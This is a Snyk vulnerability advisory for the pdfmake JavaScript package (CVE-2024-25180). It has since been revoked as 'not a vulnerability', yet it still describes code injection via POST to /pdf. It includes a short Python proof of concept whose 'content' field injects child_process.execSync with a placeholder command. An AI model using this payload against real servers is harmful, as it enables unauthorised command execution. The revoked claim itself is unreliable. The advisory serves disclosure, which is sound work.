<p>There is no fixed version for <code>pdfmake</code>.</p>

Arbitrary Code Injection The advisory has been revoked - it doesn't affect any version of package pdfmake Open this link in a new tab

Threat Intelligence

Proof of concept

0.05% (17^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-PDFMAKE-6347243
published 1 Mar 2024
disclosed 29 Feb 2024
credit João Victor

Report a new vulnerability Found a mistake?

Introduced: 29 Feb 2024

CVE-2024-25180 Open this link in a new tab CWE-94 Open this link in a new tab

How to fix?

There is no fixed version for pdfmake.

Amendment

This was deemed not a vulnerability.

Overview

pdfmake is a Client/server side PDF printing in pure JavaScript

Affected versions of this package are vulnerable to Arbitrary Code Injection via a crafted POST request to the /pdf path. An attacker can execute arbitrary code on the system by sending a specially crafted request.

PoC

import requests

data = {
    "content": "this.process.mainModule.require('child_process').execSync('<COMMAND>').toString(); const dd = 2"
}

resp = requests.post("http://ip:port/pdf", data=data)
print(resp.text)

References

Report